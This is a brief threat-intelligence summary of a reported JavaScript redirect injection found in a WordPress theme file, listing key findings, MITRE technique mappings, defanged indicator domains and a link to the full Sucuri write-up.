A recent security investigation revealed a malicious JavaScript injection affecting a WordPress website, leading to unwanted redirects, reputational damage, and exposure to potential further malicious activities for users. The infection, embedded in a theme file, utilized a two-stage redirection process to hijack website traffic. Affected: WordPress websites, online users
Keypoints :
- Malicious JavaScript was injected into a WordPress theme, causing redirects to unauthorized third-party domains.
- The infection negatively impacted the website’s reputation and put users at risk of further malicious activity.
- The initial infection method was identified as JavaScript Injection targeting specific theme files.
- Attackers leveraged external script loading to create unnoticed malicious redirects.
- At least 31 other websites were identified as being infected during the investigation.
- Common vectors for infection included compromised admin accounts, outdated plugins/themes, and inadequate file permissions.
- The presence of malicious domains raised security alarms on VirusTotal.
- Regular security audits and strong password practices were recommended as preventive measures.
MITRE Techniques :
- Technique: T1203 – Exploit Public-Facing Application: JavaScript injection used to exploit vulnerabilities in WordPress themes.
- Technique: T1071 – Application Layer Protocol: The malicious script utilizes web traffic protocols to facilitate communication for the redirection process.
- Technique: T1036 – Masquerading: Malicious JavaScript disguised as legitimate code in a theme file.
- Technique: T1070 – Indicator Removal on Host: Attackers used obfuscation techniques such as ‘noreferrer’ to conceal the redirect source.
Indicator of Compromise :
- [Domain] awards2today[.]top
- [Domain] chilsihooveek[.]net
- [File Path] ./wp-content/themes/astor/public/js/site.js
Full Story: https://blog.sucuri.net/2025/03/cascading-redirects-unmasking-a-multi-site-javascript-malware-campaign.html